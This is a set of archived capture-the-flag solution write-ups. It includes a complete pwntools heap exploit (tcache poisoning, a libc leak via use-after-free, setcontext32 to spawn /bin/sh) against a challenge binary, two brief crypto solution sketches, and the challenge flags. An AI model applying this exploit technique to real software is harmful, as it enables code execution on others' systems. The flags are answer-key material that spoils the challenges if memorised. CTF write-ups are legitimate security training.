Archived Challenges - June 2025

The program restricts us to mmaped chunks, but we can fake tcache chunks and free them. Since we can view after free, we can leak the address of the mmap chunks. The mmap chunks are adjacent to libc, so we get a libc leak and do tcache poisoning with the overflow during creation. Then, we can use the secret metadata option to allocate a normal tcache chunk and use whatever you want to achieve shell (I used setcontext32)

from pwn import * 
from setcontext32 import setcontext32 
r = process('./lfs')
libc = ELF('./libc.so.6') 
i = 0 
def create(sz,data,tag):
    global i 
    r.recvuntil(b'>')
    r.sendline(b'1')
    r.recvuntil(b'>')
    r.sendline(str(sz).encode())
    r.recvuntil(b'>')
    r.sendline(data)
    r.recvuntil(b'>')
    r.sendline(tag.ljust(64,b'\0'))
    i += 1 
    return i-1
def delete(i):
    r.recvuntil(b'>')
    r.sendline(b'2')
    r.recvuntil(b'>')
    r.sendline(str(i).encode())
def export(i):
    r.recvuntil(b'>')
    r.sendline(b'3')
    r.recvuntil(b'>')
    r.sendline(str(i).encode())
    r.recvuntil(b'---'); r.recvuntil(b'---\n')
    contents=r.recvuntil(b'---', drop=True)
    r.recvuntil(b'---\n')
    return contents 
def metadata(i, data, sz):
    r.recvuntil(b'>')
    r.sendline(b'1337')
    r.recvuntil(b'>')
    r.sendline(str(i).encode())
    r.recvuntil(b'>')
    r.sendline(str(sz).encode())
    r.recvuntil(b'>')
    r.sendline(data)
a = create(0x23000-0x18, b'a', b'a')
b = create(0x23000-0x18, b'b', b'a'*0x10+p64(0x410|0x1)) 
c = create(0x23000-0x18, b'c', b'a'*0x10+p64(0x410|0x1))
delete(a)
delete(b)
encrypted = u64(export(a)[:8])
libc.address = (encrypted << 12) + 0x26000
b_key = encrypted - 0x23 
delete(c)
dest, payload = setcontext32(
        libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
    )
c = create(0x24000-0x18, b'c', b'a'*0x10+p64(0x30|0x1)+p64(b_key ^ dest))
metadata(c, b'a'*0x408,0x408)
metadata(c, payload[:0x408], 0x408)
r.interactive()

ictf{5h0uldv3_5p3n7_m0r3_mun3y_0n_53cur17y_30b966da}

See solve.py for a solve script, I haven't typed up an explanation yet but might write a blog post on this later. TL;DR: calculate the complex lattice corresponding to the input-and output j-invariants, then recover the Möbius transformation between them using LLL and factor this matrix into its constituent isogenies and a post-isomorphism, then retrace the path to recover the digits. https://cybersharing.net/s/06a1dffd144b8a864b9f1f9ba4eb7e4f

ictf{it's all lattices...?}

Expanding on the sol for polynomials, you can recover igcd(f2,f3,f4), where i in this case is very small (60% of the time 1 digit). Thus since the gcd = f0f1, you can recover f0f1. Since coefficients of f0 and f1 always < sqrt(p) hence coefficients of f0f1 < p, you can recover the coefficients by finding the p-adic expansion of f0(p)f1(p). Thus after some math in terms of the coefficients of f0f1 we can recover q+r. Use simultaneous equation to recover q and r, then decrypt.

https://cybersharing.net/s/fc606cdc447fea68280bfefc49583945

ictf{p-4dic5_ar3_s0_fun_I_th1nk_sm4r+_h4d_a_fi3ld_d4y}